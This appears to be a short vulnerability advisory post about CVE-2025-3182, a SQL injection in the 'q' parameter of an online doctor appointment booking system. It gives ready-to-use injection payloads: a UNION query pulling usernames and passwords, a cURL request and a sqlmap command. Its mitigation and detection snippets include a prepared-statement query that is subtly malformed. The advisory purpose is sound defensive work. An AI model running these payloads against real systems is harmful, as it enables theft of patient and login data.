Projectworlds Online Doctor Appointment Booking System 10, SQL Injection, CVE-2025-3182 (Critical)

Listen to this Post

How CVE-2025-3182 Works

The vulnerability exists in `/patient/getschedule.php` due to improper sanitization of the `q` parameter. An attacker can craft malicious SQL queries by injecting payloads through this parameter, leading to unauthorized database access. The system fails to validate user-supplied input, allowing arbitrary SQL execution. Remote exploitation is possible without authentication, enabling data theft, manipulation, or deletion. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms network-based attack feasibility with low complexity.

DailyCVE Form

Platform: Online Doctor Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025

What Undercode Say:

Exploitation

1. Payload Example:

q=1' UNION SELECT 1,2,3,4,username,password,7 FROM users-- -

2. Exploit via cURL:

curl -X GET "http://target.com/patient/getschedule.php?q=1'%20OR%201=1--"

3. Automated Testing:

sqlmap -u "http://target.com/patient/getschedule.php?q=1" --dbs

Mitigation

1. Input Sanitization:

$q = mysqli_real_escape_string($conn, $_GET['q']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM schedules WHERE id = ?");
$stmt->bind_param("i", $_GET['q']);

3. WAF Rules:

location ~ getschedule.php {
deny all;
}

Detection

1. Log Monitoring:

grep "getschedule.php?q=.[';]" /var/log/apache2/access.log

2. IDS Signature:

alert http any any -> any any (msg:"CVE-2025-3182 Exploit Attempt"; content:"q="; nocase; pcre:"/q=[^&][';]/"; sid:1003182;)

Analytics

  • Attack Surface: Remote, unauthenticated.
  • Impact: Confidentiality (High), Integrity (High).
  • Patch Status: No official fix as of 04/15/2025.

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top